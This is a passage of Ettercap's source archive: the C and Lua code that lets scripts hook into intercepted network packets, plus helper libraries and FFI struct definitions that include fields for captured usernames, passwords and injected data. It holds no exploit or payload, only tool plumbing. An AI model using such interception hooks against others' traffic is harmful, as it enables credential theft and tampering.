ettercap-0.8.3.1/src/lua/ec_lua.c000664 000000 000000 00000022144 13711276346 016431 0ustar00rootroot000000 000000 /* ec_lua - Ettercap LUA integration Copyright (C) Mike Ryan and Ryan Linn This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include #include #include #include #include #include "lua.h" #include "lualib.h" #include "lauxlib.h" #include #include struct lua_hook_list { int hook_point; int func_ref; SLIST_ENTRY(lua_hook_list) next; }; SLIST_HEAD(, lua_hook_list) lua_hook_table; /* additional functions */ lua_State* _lua_state; int _lua_script_count = 0; char **_lua_scripts = NULL; int _lua_arg_count = 0; char **_lua_args = NULL; LUALIB_API int luaopen_ettercap_c(lua_State *L); int ec_lua_panic(lua_State * state); /*********************************************************/ EC_API_EXTERN int ec_lua_init() { int i = 0; DEBUG_MSG("EC_LUA: ec_lua_init started..."); if (_lua_script_count == 0) { // We've got no scripts to load, so there's no reason to start up. USER_MSG("Lua: no scripts were specified, not starting up!\n"); return 0; } // Initialize lua if ((_lua_state = luaL_newstate()) == NULL) { // Lua failed to initialize! LUA_FATAL_ERROR("EC_LUA: Failed to initialize LUA instance!"); } // Set up the 'panic' handler, which let's us control lua_atpanic(_lua_state, ec_lua_panic); /* load lua libraries */ luaL_openlibs(_lua_state); luaopen_ettercap_c(_lua_state); /* Now load the lua files */ int dofile_err_code = luaL_dofile(_lua_state, INSTALL_LUA_INIT); if (dofile_err_code == 0) { DEBUG_MSG("EC_LUA: initialized %s", INSTALL_LUA_INIT); } else { // We just error out of the whole process.. LUA_FATAL_ERROR("EC_LUA Failed to initialize %s. Error %d: %s\n", INSTALL_LUA_INIT, dofile_err_code, lua_tostring(_lua_state, -1)); } // Push an array of the list of scripts specified on the command line // we don't have args yet, but that should be next lua_getglobal(_lua_state,ETTERCAP_LUA_MODULE); lua_getfield(_lua_state, -1, "main"); lua_newtable(_lua_state); // lua_scripts for(i = 0; i < _lua_script_count; i++) { lua_pushstring(_lua_state,_lua_scripts[i]); lua_rawseti(_lua_state,-2, i+1); } lua_newtable(_lua_state); // lua_args for(i = 0; i < _lua_arg_count; i++) { lua_pushstring(_lua_state, _lua_args[i]); lua_rawseti(_lua_state,-2, i+1); } int err_code = lua_pcall(_lua_state,2,0,0); if (err_code != 0) { // Flush all messages so we can see where we are. ui_msg_flush(MSG_ALL); FATAL_ERROR("EC_LUA script load failed with error %d: \n\t%s\n", err_code, lua_tostring(_lua_state, -1)); } USER_MSG("Lua initialized!\n"); return 0; } EC_API_EXTERN int ec_lua_cli_add_script(char * script) { if (_lua_script_count == 0) SAFE_CALLOC(_lua_scripts,1,sizeof(char *)); else SAFE_REALLOC(_lua_scripts, (_lua_script_count + 1) * sizeof(char *)); _lua_scripts[_lua_script_count] = script; _lua_script_count = _lua_script_count + 1; return 0; } EC_API_EXTERN int ec_lua_cli_add_args(char * args) { if (_lua_arg_count == 0) SAFE_CALLOC(_lua_args, 1, sizeof(char *)); else SAFE_REALLOC(_lua_args, (_lua_arg_count + 1) * sizeof(char *)); _lua_args[_lua_arg_count] = args; _lua_arg_count = _lua_arg_count + 1; return 0; } EC_API_EXTERN int ec_lua_load_script(const char * name) { lua_getglobal(_lua_state,ETTERCAP_LUA_MODULE); lua_getfield(_lua_state, -1, "load_script"); lua_pushstring(_lua_state, name); lua_call(_lua_state,1,0); return 0; } EC_API_EXTERN int ec_lua_fini() { /* * called to terminate a plugin. * usually to kill threads created in the * init function or to remove hook added * previously. */ DEBUG_MSG("EC_LUA: cleanup started..."); /* cleanup Lua */ if (_lua_state != NULL) { lua_getglobal(_lua_state,ETTERCAP_LUA_MODULE); lua_getfield(_lua_state, -1, "cleanup"); int err_code = lua_pcall(_lua_state,0,0,0); if (err_code == 0) { // Close things down all nice-nice. lua_close(_lua_state); } else { // Let's make sure all the messages are flushed so we can see where // we are at. ui_msg_flush(MSG_ALL); // Dump our error and exit. We can't continue on because it is very // possible that we still have hooks dangling around out there, and // if we're only partially handling things then we could very well // get segfaults and such. FATAL_ERROR("EC_LUA: cleanup failed with error %d: %s\n", err_code, lua_tostring(_lua_state, -1)); } } else { DEBUG_MSG("EC_LUA: cleanup No cleanup needed! Lua wasn't even loaded."); } _lua_state = NULL; USER_MSG("Lua cleanup complete!\n"); return 0; } // Handles 'panic' errors in the event that lua freaks out at some point. // This just let's us handle things the "ettercap" way, if need be. int ec_lua_panic(lua_State * state) { const char *err_msg = lua_tostring(state, 1); LUA_FATAL_ERROR("EC_LUA: Unprotected error from LUA runtime: %s\n", err_msg); return 0; } void ec_lua_print_stack(FILE * io) { lua_Debug ar; int level = 0; while (lua_getstack(_lua_state, level++, &ar)) { lua_getinfo(_lua_state, "Snl", &ar); fprintf(io, "\t%s:", ar.short_src); if (ar.currentline > 0) fprintf(io, "%d:", ar.currentline); if (*ar.namewhat != '\0') { /* is there a name? */ fprintf(io, " in function " LUA_QS, ar.name); } else { if (*ar.what == 'm') /* main? */ fprintf(io, " in main chunk"); else if (*ar.what == 'C' || *ar.what == 't') fprintf(io, " ?"); /* C function or tail call */ else fprintf(io, " in function <%s:%d>", ar.short_src, ar.linedefined); } fprintf(io, "\n"); } fprintf(io, "Lua stack depth: %d\n", level - 1); } // Passes the hooked packet into Lua, along with its hook point. int ec_lua_dispatch_hooked_packet(int point, struct packet_object * po) { struct lua_hook_list *lua_hook_entry; int err_code; // Don't have to do anything if we don't have a state. if (_lua_state == NULL) return 0; SLIST_FOREACH(lua_hook_entry, &lua_hook_table, next) { if (point == lua_hook_entry->hook_point) { lua_rawgeti(_lua_state, LUA_REGISTRYINDEX, lua_hook_entry->func_ref); lua_pushlightuserdata(_lua_state, (void *) po); err_code = lua_pcall(_lua_state,1,0,0); if (err_code != 0) { LUA_FATAL_ERROR("EC_LUA ec_lua_dispatch_hooked_packet Failed. Error %d: %s\n", err_code, lua_tostring(_lua_state, -1)); } } } return 0; } /// Lua APIs // This is just a simple wrapper for USER_MSG. static int l_log(lua_State* state) { const char *str = lua_tostring(state, 1); USER_MSG("%s\n", str); return 0; } // This is called when a hook is added in lua-land. We'll use this in the // near future to make our dispatching to lua much more efficient. static int l_hook_add(lua_State* state) { int point, r; struct lua_hook_list *lua_hook_entry; point = lua_tointeger(state, 1); // Set the top of the stack to point to the function. lua_settop(state, 2); // Show a reference to the function into the registry. r = luaL_ref(state, LUA_REGISTRYINDEX); SAFE_CALLOC(lua_hook_entry, 1, sizeof(struct lua_hook_list)); lua_hook_entry->hook_point = point; lua_hook_entry->func_ref = r; SLIST_INSERT_HEAD(&lua_hook_table, lua_hook_entry, next); return 0; } static const struct luaL_Reg ec_lua_lib[] = { {"hook_add", l_hook_add}, {"log", l_log}, {NULL, NULL} }; LUALIB_API int luaopen_ettercap_c(lua_State *L) { luaL_register(L, ETTERCAP_C_API_LUA_MODULE, ec_lua_lib); return 1; } EC_API_EXTERN void ec_lua_print_info(FILE* debug_file) { fprintf (debug_file, "-> ${INSTALL_LUA_ROOT} %s\n", INSTALL_LUA_ROOT); fprintf (debug_file, "-> ${INSTALL_LUA_INIT} %s\n", INSTALL_LUA_INIT); fprintf (debug_file, "-> ${INSTALL_LUA_CORE} %s\n", INSTALL_LUA_CORE); fprintf (debug_file, "-> ${INSTALL_LUA_SCRIPTS} %s\n", INSTALL_LUA_SCRIPTS); } EC_API_EXTERN void ec_lua_print_version(FILE* debug_file) { fprintf(debug_file, "-> lua version %s\n", LUA_VERSION); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/lua/ec_lua_config.h.cmake000664 000000 000000 00000000411 13711276346 021033 0ustar00rootroot000000 000000 #ifndef EC_LUA_CONFIG_H #cmakedefine INSTALL_LUA_ROOT "@INSTALL_LUA_ROOT@" #cmakedefine INSTALL_LUA_INIT "@INSTALL_LUA_INIT@" #cmakedefine INSTALL_LUA_CORE "@INSTALL_LUA_CORE@" #cmakedefine INSTALL_LUA_SCRIPTS "@INSTALL_LUA_SCRIPTS@" #endif ettercap-0.8.3.1/src/lua/share/000775 000000 000000 00000000000 13711276346 016134 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/CMakeLists.txt000664 000000 000000 00000000431 13711276346 020672 0ustar00rootroot000000 000000 add_subdirectory(core) add_subdirectory(lib) add_subdirectory(scripts) add_subdirectory(third-party) configure_file(${CMAKE_CURRENT_SOURCE_DIR}/init.lua.in ${CMAKE_CURRENT_BINARY_DIR}/init.lua) install(FILES ${CMAKE_CURRENT_BINARY_DIR}/init.lua DESTINATION ${INSTALL_LUA_ROOT}) ettercap-0.8.3.1/src/lua/share/core/000775 000000 000000 00000000000 13711276346 017064 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/core/CMakeLists.txt000664 000000 000000 00000000611 13711276346 021622 0ustar00rootroot000000 000000 install(FILES dumper.lua ettercap.lua ettercap_ffi.lua ettercap_reg.lua hook_points.lua packet.lua packet_meta.lua shortpacket.lua shortsession.lua eclib.lua http.lua base64.lua ec_string.lua DESTINATION ${INSTALL_LUA_CORE}) ettercap-0.8.3.1/src/lua/share/core/base64.lua000664 000000 000000 00000004766 13711276346 020670 0ustar00rootroot000000 000000 -- Base64-encoding -- Sourced from http://en.wikipedia.org/wiki/Base64 require('math') local __author__ = 'Daniel Lindsley' local __version__ = 'scm-1' local __license__ = 'BSD' local index_table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' function to_binary(integer) local remaining = tonumber(integer) local bin_bits = '' for i = 7, 0, -1 do local current_power = math.pow(2, i) if remaining >= current_power then bin_bits = bin_bits .. '1' remaining = remaining - current_power else bin_bits = bin_bits .. '0' end end return bin_bits end function from_binary(bin_bits) return tonumber(bin_bits, 2) end function to_base64(to_encode) local bit_pattern = '' local encoded = '' local trailing = '' for i = 1, string.len(to_encode) do bit_pattern = bit_pattern .. to_binary(string.byte(string.sub(to_encode, i, i))) end -- Check the number of bytes. If it's not evenly divisible by three, -- zero-pad the ending & append on the correct number of ``=``s. if math.mod(string.len(bit_pattern), 3) == 2 then trailing = '==' bit_pattern = bit_pattern .. '0000000000000000' elseif math.mod(string.len(bit_pattern), 3) == 1 then trailing = '=' bit_pattern = bit_pattern .. '00000000' end for i = 1, string.len(bit_pattern), 6 do local byte = string.sub(bit_pattern, i, i+5) local offset = tonumber(from_binary(byte)) encoded = encoded .. string.sub(index_table, offset+1, offset+1) end return string.sub(encoded, 1, -1 - string.len(trailing)) .. trailing end function from_base64(to_decode) local padded = to_decode:gsub("%s", "") local unpadded = padded:gsub("=", "") local bit_pattern = '' local decoded = '' for i = 1, string.len(unpadded) do local char = string.sub(to_decode, i, i) local offset, _ = string.find(index_table, char) if offset == nil then error("Invalid character '" .. char .. "' found.") end bit_pattern = bit_pattern .. string.sub(to_binary(offset-1), 3) end for i = 1, string.len(bit_pattern), 8 do local byte = string.sub(bit_pattern, i, i+7) decoded = decoded .. string.char(from_binary(byte)) end local padding_length = padded:len()-unpadded:len() if (padding_length == 1 or padding_length == 2) then decoded = decoded:sub(1,-2) end return decoded end ettercap-0.8.3.1/src/lua/share/core/dumper.lua000664 000000 000000 00000016123 13711276346 021066 0ustar00rootroot000000 000000 --- -- DataDumper.lua -- Copyright (c) 2007 Olivetti-Engineering SA -- -- Permission is hereby granted, free of charge, to any person -- obtaining a copy of this software and associated documentation -- files (the "Software"), to deal in the Software without -- restriction, including without limitation the rights to use, -- copy, modify, merge, publish, distribute, sublicense, and/or sell -- copies of the Software, and to permit persons to whom the -- Software is furnished to do so, subject to the following -- conditions: -- -- The above copyright notice and this permission notice shall be -- included in all copies or substantial portions of the Software. -- -- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -- EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES -- OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -- NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT -- HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, -- WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -- FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR -- OTHER DEALINGS IN THE SOFTWARE. local dumplua_closure = [[ local closures = {} local function closure(t) closures[#closures+1] = t t[1] = assert(loadstring(t[1])) return t[1] end for _,t in pairs(closures) do for i = 2,#t do debug.setupvalue(t[1], i-1, t[i]) end end ]] local lua_reserved_keywords = { 'and', 'break', 'do', 'else', 'elseif', 'end', 'false', 'for', 'function', 'if', 'in', 'local', 'nil', 'not', 'or', 'repeat', 'return', 'then', 'true', 'until', 'while' } local function keys(t) local res = {} local oktypes = { stringstring = true, numbernumber = true } local function cmpfct(a,b) if oktypes[type(a)..type(b)] then return a < b else return type(a) < type(b) end end for k in pairs(t) do res[#res+1] = k end table.sort(res, cmpfct) return res end local c_functions = {} for _,lib in pairs{'_G', 'string', 'table', 'math', 'io', 'os', 'coroutine', 'package', 'debug'} do local t = _G[lib] or {} lib = lib .. "." if lib == "_G." then lib = "" end for k,v in pairs(t) do if type(v) == 'function' and not pcall(string.dump, v) then c_functions[v] = lib..k end end end function DataDumper(value, varname, fastmode, ident) local defined, dumplua = {} -- Local variables for speed optimization local string_format, type, string_dump, string_rep = string.format, type, string.dump, string.rep local tostring, pairs, table_concat = tostring, pairs, table.concat local keycache, strvalcache, out, closure_cnt = {}, {}, {}, 0 setmetatable(strvalcache, {__index = function(t,value) local res = string_format('%q', value) t[value] = res return res end}) local fcts = { string = function(value) return strvalcache[value] end, number = function(value) return value end, boolean = function(value) return tostring(value) end, ['nil'] = function(value) return 'nil' end, ['function'] = function(value) return string_format("loadstring(%q)", string_dump(value)) end, userdata = function() error("Cannot dump userdata") end, thread = function() error("Cannot dump threads") end, } local function test_defined(value, path) if defined[value] then if path:match("^getmetatable.*%)$") then out[#out+1] = string_format("s%s, %s)\n", path:sub(2,-2), defined[value]) else out[#out+1] = path .. " = " .. defined[value] .. "\n" end return true end defined[value] = path end local function make_key(t, key) local s if type(key) == 'string' and key:match('^[_%a][_%w]*$') then s = key .. "=" else s = "[" .. dumplua(key, 0) .. "]=" end t[key] = s return s end for _,k in ipairs(lua_reserved_keywords) do keycache[k] = '["'..k..'"] = ' end if fastmode then fcts.table = function (value) -- Table value local numidx = 1 out[#out+1] = "{" for key,val in pairs(value) do if key == numidx then numidx = numidx + 1 else out[#out+1] = keycache[key] end local str = dumplua(val) out[#out+1] = str.."," end if string.sub(out[#out], -1) == "," then out[#out] = string.sub(out[#out], 1, -2); end out[#out+1] = "}" return "" end else fcts.table = function (value, ident, path) if test_defined(value, path) then return "nil" end -- Table value local sep, str, numidx, totallen = " ", {}, 1, 0 local meta, metastr = (debug or getfenv()).getmetatable(value) if meta then ident = ident + 1 metastr = dumplua(meta, ident, "getmetatable("..path..")") totallen = totallen + #metastr + 16 end for _,key in pairs(keys(value)) do local val = value[key] local s = "" local subpath = path if key == numidx then subpath = subpath .. "[" .. numidx .. "]" numidx = numidx + 1 else s = keycache[key] if not s:match "^%[" then subpath = subpath .. "." end subpath = subpath .. s:gsub("%s*=%s*$","") end s = s .. dumplua(val, ident+1, subpath) str[#str+1] = s totallen = totallen + #s + 2 end if totallen > 80 then sep = "\n" .. string_rep(" ", ident+1) end str = "{"..sep..table_concat(str, ","..sep).." "..sep:sub(1,-3).."}" if meta then sep = sep:sub(1,-3) return "setmetatable("..sep..str..","..sep..metastr..sep:sub(1,-3)..")" end return str end fcts['function'] = function (value, ident, path) if test_defined(value, path) then return "nil" end if c_functions[value] then return c_functions[value] elseif debug == nil or debug.getupvalue(value, 1) == nil then return string_format("loadstring(%q)", string_dump(value)) end closure_cnt = closure_cnt + 1 local res = {string.dump(value)} for i = 1,math.huge do local name, v = debug.getupvalue(value,i) if name == nil then break end res[i+1] = v end return "closure " .. dumplua(res, ident, "closures["..closure_cnt.."]") end end function dumplua(value, ident, path) return fcts[type(value)](value, ident, path) end if varname == nil then varname = "return " elseif varname:match("^[%a_][%w_]*$") then varname = varname .. " = " end if fastmode then setmetatable(keycache, {__index = make_key }) out[1] = varname table.insert(out,dumplua(value, 0)) return table.concat(out) else setmetatable(keycache, {__index = make_key }) local items = {} for i=1,10 do items[i] = '' end items[3] = dumplua(value, ident or 0, "t") if closure_cnt > 0 then items[1], items[6] = dumplua_closure:match("(.*\n)\n(.*)") out[#out+1] = "" end if #out > 0 then items[2], items[4] = "local t = ", "\n" items[5] = table.concat(out) items[7] = varname .. "t" else items[2] = varname end return table.concat(items) end end ettercap-0.8.3.1/src/lua/share/core/ec_string.lua000664 000000 000000 00000000310 13711276346 021536 0ustar00rootroot000000 000000 starts_with = function (str,val) if str == nil or val == nil then return 0 end local spos, endpos = string.find(str,val) if spos == nil then return 0 end return 1 end ettercap-0.8.3.1/src/lua/share/core/eclib.lua000664 000000 000000 00000005006 13711276346 020646 0ustar00rootroot000000 000000 --- -- Some helper functions -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. --- Basic Split taken from http://lua-users.org/wiki/SplitJoin -- @param str -- @param pat -- @return table split = function(str, pat) local t = {} -- NOTE: use {n = 0} in Lua-5.0 local fpat = "(.-)" .. pat local last_end = 1 local s, e, cap = str:find(fpat, 1) while s do if s ~= 1 or cap ~= "" then table.insert(t,cap) end last_end = e+1 s, e, cap = str:find(fpat, last_end) end if last_end <= #str then cap = str:sub(last_end) table.insert(t, cap) end return t end ---Returns a string representation of a hex dump of a string (containing binary bytes even zero) hexdump = function(s) local manLine="" --human readable format of the current line local hexLine="" --hexadecimal representation of the current line local address=0 --the address where the current line starts local LINE_LENGTH=16 --how many characters per line? local ADDRESS_LENGTH=4 --how many characters for the address part? local ret="" if not hex then hex={} local digit={[0]="0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F"} for i=0,15 do for j=0,15 do hex[i*16+j]=digit[i]..digit[j] end end end for i=1,s:len() do local ch=s:sub(i,i) if ch:find("%c") then ch="." end--if ch is a control character, assign some default value to it manLine=manLine..ch hexLine=hexLine..hex[s:byte(i)].." " if (i % LINE_LENGTH)==0 or i==s:len() then --print(string.format("%04u | %-48s | %s",address,hexLine,manLine)) ret=ret..string.format("%0"..ADDRESS_LENGTH.."u | %-"..3*LINE_LENGTH.."s| %s\n",address,hexLine,manLine) manLine,hexLine="","" address=i end end return ret end local eclib = {} eclib.split = split eclib.hexdump = hexdump return eclib ettercap-0.8.3.1/src/lua/share/core/ettercap.lua000664 000000 000000 00000022765 13711276346 021412 0ustar00rootroot000000 000000 --- -- Basic ettercap functionality! -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License along -- with this program; if not, write to the Free Software Foundation, Inc., -- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. -- -- All of our core stuff will reside in the "ettercap" namespace. ettercap = {} local ffi = require("ettercap_ffi") require('packet_meta') local ettercap_c = require("ettercap_c") local eclib = require("eclib") local op = require('io') ettercap.reg = require("ettercap_reg") --- Log's a message using ettercap's ui_msg function. -- @see string.format -- @param fmt The format string -- @param ... Variable arguments to pass in log = function(fmt, ...) -- We don't want any format string "accidents" on the C side of things.. -- so, we will let lua handle it. ettercap_c.log(string.format(fmt, ...)) end file_exists = function(filename) local msg = nil local fio, errmsg, errno = io.open(filename, "r") if fio then fio:close() return true end assert(errno == 2, "Could not open '" .. filename .. "': " .. errmsg) return false end require('dumper') --- Dumps data structure(s) to log -- @param ... The data to dump! dump = function (...) log(DataDumper(...), "\n---") end -- Script interface -- -- All Ettercap LUA scripts are initialized using a common interface. We've -- modeled this interface very closely after that of NMAP's NSE script -- interface. Our hope is that the community's familiarity with NSE will -- lower the barrier for entry for those looking to write Ettercap LUA -- scripts. -- -- -- Data structures: -- packet_object - Access to the Ettercap "packet_object" (originally -- defined in include/ec_packet.h) is provided via a -- light luajit FFI wrapper. Details on interacting with -- data-types via luajit FFI can be found here: -- http://luajit.org/ext_ffi_semantics.html. -- -- Generally, script implementations should avoid direct -- modifications to packet_object, or any FFI wrapped -- structure, instead favoring modification through -- defined ettercap.* interfaces. -- -- NOTE: Careful consideration must be taken to when -- interacting with FFI-wrapped data-structures! Data -- originating from outside of the LUA VM must have their -- memory managed *manually*! See the section of luajit's -- FFI Semantics on "Garbage Collection of cdata Objects" -- for details. -- -- -- Script requirements: -- -- description - (string) Like that of NSE, each script must have a -- description of the its functionality. -- -- action - (function (packet_object)) The action of a script operates -- on a FFI-wrapped packet_object. -- -- Optional: -- -- packetrule - (function (packet_object)) If implemented, then this -- function must return true for a given packet_object -- before that packet_object is passed to the script's action. -- local Script = {} do local coroutine = require "coroutine"; local debug = require "debug"; local traceback = debug.traceback; local ETTERCAP_SCRIPT_RULES = { packetrule = "packetrule", }; -- These are the components of a script that are required. local REQUIRED_FIELDS = { description = "string", action = "function", -- categories = "table", -- dependencies = "table", }; function Script.new (filename, arguments) local script_params = arguments or {}; local script_path = filename local full_path = ETTERCAP_LUA_SCRIPT_PATH .. "/" .. filename; local file_closure = nil if file_exists(filename) == true then file_closure = assert(loadfile(filename)) script_path = filename elseif file_exists(full_path) == true then file_closure = assert(loadfile(full_path)) script_path = full_path else log("ERROR: Could not find script '%s'\n", filename) return nil end local env = { SCRIPT_PATH = script_path, SCRIPT_ARGS = script_params, dependencies = {}, }; -- No idea what this does. setmetatable(env, {__index = _G}); setfenv(file_closure, env); local co = coroutine.create(file_closure); -- Create a garbage thread local status, e = coroutine.resume(co); -- Get the globals it loads in env if not status then log("Failed to load %s:\n%s", filename, traceback(co, e)); --error("could not load script"); return nil end for required_field_name in pairs(REQUIRED_FIELDS) do local required_type = REQUIRED_FIELDS[required_field_name]; local raw_field = rawget(env, required_field_name) local actual_type = type(raw_field); assert(actual_type == required_type, "Incorrect of missing field: '" .. required_field_name .. "'." .. " Must be of type: '" .. required_type .. "'" .. " got type: '" .. actual_type .. "'." .. " Script: '" .. env["SCRIPT_PATH"] .. "'" ); end -- Check our rules.... local rules = {}; for rule in pairs(ETTERCAP_SCRIPT_RULES) do local rulef = rawget(env, rule); assert(type(rulef) == "function" or rulef == nil, rule.." must be a function!"); rules[rule] = rulef; end local action = env["action"]; -- Make sure we have a hook_point! local hook_point = rawget(env, "hook_point") assert(type(hook_point) == "number", "hook_point must be a number!") local script = { filename = filename, action = action, rules = rules, hook_point = hook_point, env = env, file_closure = file_closure, script_params = script_params }; return setmetatable(script, {__index = Script, __metatable = Script}); end end -- Stores hook mappings. --- Called during ettercap's shutdown local ettercap_cleanup = function() end local packet_object_ctype = ffi.typeof("struct packet_object *") local ffi_cast = ffi.cast local create_hook = function(script) local packetrule = script.rules["packetrule"] local hook_func = function(packet_object_ptr) local packet_object = ffi_cast(packet_object_ctype, packet_object_ptr); if (not(packetrule == nil)) then if not(packetrule(packet_object) == true) then return false end end script.action(packet_object) end return(hook_func) end -- Adds a hook local hook_add = function (hook_point, func) ettercap_c.hook_add(hook_point, func) end -- Processes all the --lua-script arguments into a single list of script -- names. -- -- @param scripts An array of script cli arguments -- @return A table containing all the split arguments local cli_split_scripts = function (scripts) -- This keeps track of what script names have already been encountered. -- This prevents us from loading the same script more than once. local loaded_scripts = {} local ret = {} for v = 1, #scripts do local s = scripts[v] local script_list = eclib.split(s, ",") for i = 1, #script_list do if (loaded_scripts[script_list[i]] == nil) then -- We haven't loaded this script, yet, so add it it our list. table.insert(ret, script_list[i]) loaded_scripts[script_list[i]] = 1 end end end return ret end -- Processes all the --lua-args arguments into a single list of args -- names. -- -- @param args An array of args cli arguments -- @return A table containing all the split arguments local cli_split_args = function (args) local ret = {} for v = 1, #args do local s = args[v] local arglist = eclib.split(s, ",") for i = 1, #arglist do -- We haven't loaded this args, yet, so add it it our list. local temp = eclib.split(arglist[i],"=") ret[temp[1]] = temp[2] end end return ret end -- Loads a script. -- -- @param name (string) The name of the script we want to load. -- @param args (table) A table of key,value tuples local ettercap_load_script = function (name, args) local script = assert(Script.new(name, args), "Failed to load: " .. name) hook_add(script.hook_point, create_hook(script)) end -- Primary entry point for ettercap lua environment -- @param lua_scripts Array of CLI script strings -- @param lua_args Array of CLI argument strings local ettercap_main = function (lua_scripts, lua_args) local scripts = cli_split_scripts(lua_scripts) local args = cli_split_args(lua_args) for i = 1, #scripts do ettercap_load_script(scripts[i], args) end end -- C -> LUA api functions. These should never be called from scripts! ettercap.main = ettercap_main ettercap.cleanup = ettercap_cleanup -- Global functions ettercap.log = log ettercap.dump = dump -- Is this even nescessary? Nobody should be requiring this except for -- init.lua... However, I'll act like this is required. return ettercap ettercap-0.8.3.1/src/lua/share/core/ettercap_ffi.lua000664 000000 000000 00000017206 13711276346 022230 0ustar00rootroot000000 000000 --- -- This is our ettercap FFI interface. Nothing to see, here. -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. local ettercap_ffi = require("ffi") ettercap_ffi.cdef[[ typedef unsigned char u_int8_t; typedef unsigned char u_char; typedef unsigned short int u_int16_t; typedef unsigned int u_int32_t; typedef unsigned long int u_int64_t; typedef char int8_t; typedef short int int16_t; typedef int int32_t; typedef long int int64_t; typedef int8_t int8; typedef int16_t int16; typedef int32_t int32; typedef int64_t int64; typedef u_int8_t u_int8; typedef u_int16_t u_int16; typedef u_int32_t u_int32; typedef u_int64_t u_int64; // This is just a hack structure so we can see the first int on the ident // structures. struct ident_magic { u_int32 magic; }; struct ec_session { void *ident; size_t ident_len; void *data; size_t data_len; int flag; /* Used to trace headers for injection */ struct ec_session *prev_session; int (*match)(void *id_sess, void *id); void (*free)(void *data, size_t data_len); }; struct ip_addr { u_int16 addr_type; u_int16 addr_len; /* this must be aligned in memory */ u_int8 addr[16]; }; struct passive_info { char fingerprint[29]; char flags; }; struct dissector_info { char *user; char *pass; char *info; char *banner; char failed; }; struct timeval { long int tv_sec; long int tv_usec; }; struct packet_object { /* timestamp of the packet */ struct timeval ts; struct L2 { u_int8 proto; u_char * header; size_t len; u_int8 src[6]; u_int8 dst[6]; u_int8 flags; } L2; struct L3 { u_int16 proto; u_char * header; u_char * options; size_t len; size_t payload_len; size_t optlen; struct ip_addr src; struct ip_addr dst; u_int8 ttl; } L3; struct L4 { u_int8 proto; u_int8 flags; u_char * header; u_char * options; size_t len; size_t optlen; u_int16 src; u_int16 dst; u_int32 seq; u_int32 ack; } L4; struct data { u_char * data; size_t len; /* * buffer containing the data to be displayed. * some dissector decripts the traffic, but the packet must be forwarded as * is, so the decripted data must be placed in a different buffer. * this is that bufffer and it is malloced by tcp or udp dissector. */ size_t disp_len; u_char * disp_data; /* for modified packet this is the delta for the length */ int delta; size_t inject_len; /* len of the injection */ u_char *inject; /* the fuffer used for injection */ } DATA; size_t fwd_len; /* length of the packet to be forwarded */ u_char * fwd_packet; /* the pointer to the buffer to be forwarded */ size_t len; /* total length of the packet */ u_char * packet; /* the buffer containing the real packet */ /* Trace current session for injector chain */ struct ec_session *session; u_int16 flags; /* flags relative to the packet */ /* * here are stored the user and pass collected by dissectors * the "char *" are malloc(ed) by dissectors */ struct dissector_info DISSECTOR; /* the struct for passive identification */ struct passive_info PASSIVE; }; enum { HOOK_RECEIVED = 0, /* raw packet, the L* structures are not filled */ HOOK_DECODED = 1, /* all the packet after the protocol stack parsing */ HOOK_PRE_FORWARD = 2, /* right before the forward (if it has to be forwarded) */ HOOK_HANDLED = 3, /* top of the stack but before the decision of PO_INGORE */ HOOK_FILTER = 4, /* the content filtering point */ HOOK_DISPATCHER = 5, /* in the TOP HALF (the packet is a copy) */ HOOK_PACKET_BASE = 50, HOOK_PACKET_ETH, HOOK_PACKET_FDDI, HOOK_PACKET_TR, HOOK_PACKET_WIFI, HOOK_PACKET_ARP, HOOK_PACKET_ARP_RQ, HOOK_PACKET_ARP_RP, HOOK_PACKET_IP, HOOK_PACKET_IP6, HOOK_PACKET_UDP, HOOK_PACKET_TCP, HOOK_PACKET_ICMP, HOOK_PACKET_LCP, HOOK_PACKET_ECP, HOOK_PACKET_IPCP, 